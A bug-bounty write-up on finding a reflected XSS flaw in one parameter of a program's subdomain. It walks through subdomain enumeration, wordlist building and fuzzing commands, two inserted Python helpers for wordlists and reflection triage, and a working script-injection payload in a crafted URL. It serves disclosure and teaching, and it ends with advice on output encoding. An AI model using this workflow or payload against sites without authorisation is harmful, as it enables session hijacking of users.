
Overview

This report details the discovery and exploitation of a reflected XSS vulnerability on a website in scope of a Vulnerability Disclosure Program (VDP).

Reconnaissance

The reconnaissance phase began with subdomain enumeration, looking for recently added assets that previous researchers might not have examined. I started with subfinder:

subfinder -d target.com -all -silent | tee target.com.subs

The -all switch queries every available source and noticeably improved the results. To extend coverage to names no passive source had seen, DNS brute-forcing was also run with shuffledns against a wordlist of approximately 24 million entries:

shuffledns -d target.com -r resolver.txt -w words.txt -mode bruteforce -silent | anew target.com.subs

Combined, the two approaches produced approximately 400 unique subdomains. To find out which of them served HTTP, I ran them through httpx (-sc prints the status code, -title the page title, and -fr follows redirects):

cat target.com.subs | httpx -silent -sc -title -fr | tee target.com.http

Ultimately, 23 subdomains were confirmed to have active HTTP services.

In-depth Analysis and Fuzzing

One of these subdomains, commercial.target.com, was selected for deeper investigation. Historical URLs and parameters were collected from the Wayback Machine with waybackurls:

echo commercial.target.com | waybackurls > commercial.target.com.wayback

The resulting data contained numerous URLs and JavaScript files. All unique words from these URLs were extracted with diverman:

python diverman.py -f commercial.target.com.wayback | sort -u > uniquewords.txt

This yielded approximately 14,000 unique, target-specific terms. Because they come from the application's own paths, parameter names and script names, they make a far better fuzzing wordlist for this host than a generic one.
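The word-extraction step above is a tool invocation; the following script, added here as an illustration and not part of the original report or of any of the tools it names, shows what such an extractor does: it splits each archived URL into path segments, query keys and values, then into sub-words (on punctuation and camelCase), and drops tokens that carry no letters or contain whitespace. The sample URLs are constructed for the example and are not from the target.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed stand-in for waybackurls output (not data from the report).
SAMPLE_WAYBACK = """\
https://commercial.target.com/portal/search?q=laptop&searchKey=dell
https://commercial.target.com/portal/orders/history?s=2021&page=2
https://commercial.target.com/static/js/orderTracker.min.js?v=3.2.1
https://commercial.target.com/portal/api/v2/productCatalog.json
https://commercial.target.com/portal/search?q=monitor%20stand
"""

# Splits camelCase identifiers: "orderTracker" -> ["order", "Tracker"]
CAMEL = re.compile(r"[A-Z]?[a-z0-9]+|[A-Z]+(?![a-z])")


def tokenize_url(url):
    """Yield candidate words from one URL: each path segment, each query
    key and value, then the sub-words of each (split on punctuation and
    camelCase), so orderTracker.min.js also yields orderTracker, order,
    Tracker, min and js."""
    parts = urlsplit(url.strip())
    pieces = [unquote(seg) for seg in parts.path.split("/") if seg]
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        pieces.append(key)
        if value:
            pieces.append(value)
    for piece in pieces:
        yield piece
        for sub in re.split(r"[^A-Za-z0-9]+", piece):
            if sub:
                yield sub
                yield from CAMEL.findall(sub)


def build_wordlist(wayback_text):
    """Return a sorted, de-duplicated wordlist from newline-separated URLs.
    Tokens without a letter (page counters, version numbers) or containing
    whitespace are dropped: they cost fuzzing requests without describing
    the application."""
    words = set()
    for line in wayback_text.splitlines():
        if not line.strip():
            continue
        for w in tokenize_url(line):
            if re.search(r"[A-Za-z]", w) and not re.search(r"\s", w):
                words.add(w)
    return sorted(words)


def write_wordlist(path, wayback_text):
    """Write the wordlist one term per line (ffuf/x8 format); return its size."""
    wl = build_wordlist(wayback_text)
    with open(path, "w") as fh:
        fh.write("\n".join(wl) + "\n")
    return len(wl)


if __name__ == "__main__":
    print("\n".join(build_wordlist(SAMPLE_WAYBACK)))
```

Keeping both the whole segment (orderTracker.min.js) and its parts is deliberate: the whole segment finds the file again under another directory, while the parts (order, Tracker, api, v2) recombine into paths and parameter names the archive never recorded.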

Fuzzing then proceeded with ffuf to identify hidden or undocumented paths. -mc all shows every status code, and -fs 14 filters out responses whose body is 14 bytes, typically the size of the server's response for non-existent paths; the same wordlist was applied one directory level deeper each time:

ffuf -w uniquewords.txt -u https://commercial.target.com/FUZZ -c -mc all -fs 14
ffuf -w uniquewords.txt -u https://commercial.target.com/path/FUZZ -c -mc all -fs 14
ffuf -w uniquewords.txt -u https://commercial.target.com/path/path/FUZZ -c -mc all -fs 14

This process led to a specific endpoint:

https://commercial.target.com/path/path/path

Parameter fuzzing was then conducted with the tool x8 to uncover potentially exploitable parameters:

x8 -u https://commercial.target.com/path/path/path -w uniquewords.txt -X GET POST

The parameter fuzzing identified three parameters whose values were reflected in the response: q, s, and searchKey.

Vulnerability Identification and Exploitation

Initial tests with the value amir123 confirmed that all three parameters were reflected in the page:

https://commercial.target.com/path/path/path?q=amir123&s=amir123&searchKey=amir123

Next, the probe </test> was sent in each parameter to see how the application handled HTML metacharacters. The q and s parameters came back HTML-encoded, whereas searchKey was echoed into the page unchanged, indicating a reflected XSS vulnerability.
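The probe-and-compare step can be made systematic. The script below is an added example, not code from the report, that builds one probe URL per reflected parameter (keeping the others at the neutral canary amir123 so responses stay comparable) and classifies each response by inspecting what survived around an alphanumeric marker: every metacharacter in the probe is reported as raw, encoded or absent, and the parameter as a whole as raw, partial, encoded, stripped or not reflected. The endpoint path is the placeholder from the report, the marker k9zq and the three sample response bodies are constructed for the example, and the results match what the report describes for q, s and searchKey.

```python
import html
from urllib.parse import urlencode

TARGET = "https://commercial.target.com/path/path/path"  # placeholder path from the report
REFLECTED_PARAMS = ["q", "s", "searchKey"]
CANARY = "amir123"
MARK = "k9zq"                  # constructed marker, unlikely to occur naturally
PROBE = f'{MARK}"<{MARK}>'     # each metacharacter sits next to the marker

# Entity forms a server may substitute for each metacharacter.
ENCODED_FORMS = {
    '"': ["&quot;", "&#34;", "&#x22;"],
    "<": ["&lt;", "&#60;", "&#x3c;"],
    ">": ["&gt;", "&#62;", "&#x3e;"],
}


def probe_url(param, value=PROBE):
    """URL that sends `value` in one parameter and the canary in the others."""
    query = {p: CANARY for p in REFLECTED_PARAMS}
    query[param] = value
    return f"{TARGET}?{urlencode(query)}"


def survey_metachars(body):
    """For each metacharacter in PROBE, report 'raw', 'encoded' or 'absent'
    by looking at what sits directly next to the marker in the response."""
    lowered = body.lower()  # entity names are lowercase; hex digits may not be
    checks = {
        '"': (MARK + '"', [MARK + e for e in ENCODED_FORMS['"']]),
        "<": ("<" + MARK, [e + MARK for e in ENCODED_FORMS["<"]]),
        ">": (MARK + ">", [MARK + e for e in ENCODED_FORMS[">"]]),
    }
    result = {}
    for ch, (raw, encoded) in checks.items():
        if raw in lowered:
            result[ch] = "raw"
        elif any(e in lowered for e in encoded):
            result[ch] = "encoded"
        else:
            result[ch] = "absent"
    return result


def classify_reflection(body):
    """'raw' = every metacharacter came back verbatim (injection point);
    'partial' = some did (context-dependent, needs a tailored payload);
    'encoded' = all were entity-encoded; 'stripped' = the marker came back
    but the metacharacters vanished; 'not reflected' otherwise."""
    if MARK not in body.lower():
        return "not reflected"
    states = set(survey_metachars(body).values())
    if states == {"raw"}:
        return "raw"
    if "raw" in states:
        return "partial"
    if "encoded" in states:
        return "encoded"
    return "stripped"


# Constructed responses standing in for the three probe requests:
# q and s escape the probe, searchKey echoes it verbatim into an attribute.
SAMPLE_RESPONSES = {
    "q": f'<input name="q" value="{html.escape(PROBE, quote=True)}">',
    "s": f'<p>Results for: {html.escape(PROBE, quote=True)}</p>',
    "searchKey": f'<input name="searchKey" value="{PROBE}">',
}


def triage(responses):
    """Map each parameter to its reflection class."""
    return {param: classify_reflection(body) for param, body in responses.items()}


if __name__ == "__main__":
    for p in REFLECTED_PARAMS:
        print(probe_url(p))
    print(triage(SAMPLE_RESPONSES))
```

A raw quote plus raw angle brackets inside a value attribute is exactly the situation the final payload below exploits: the quote closes the attribute, > closes the tag, and the script element follows. A partial result (say, quotes escaped but angle brackets raw, or the reverse) is not a dead end but calls for a payload that matches the reflection context rather than the generic one.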

The final proof-of-concept payload executed successfully:

"><script>alert(origin)</script>

URL:

https://commercial.target.com/path/path/path/?searchKey="><script>alert(origin)</script>


Impact

The vulnerability allowed an attacker who could get a victim to open a crafted link to execute arbitrary JavaScript in the origin of commercial.target.com in the victim's browser. Depending on how session cookies are flagged, this enables cookie theft (cookies without HttpOnly are readable from script) or, failing that, actions performed in the victim's authenticated session, either way leading to unauthorized access to the user's account.

Although HackerOne triage rated the severity as medium, the report was validated promptly and led to an invitation to a private bug bounty program within four hours of submission.

Conclusion

This report highlights the importance of thorough reconnaissance, targeted fuzzing, and careful testing of every reflected parameter. On the defensive side, context-appropriate output encoding of user-controlled data, applied consistently to every parameter rather than most of them, is what prevents cross-site scripting; here two of three parameters were handled correctly and the third was not.


I hope this report has been useful to you.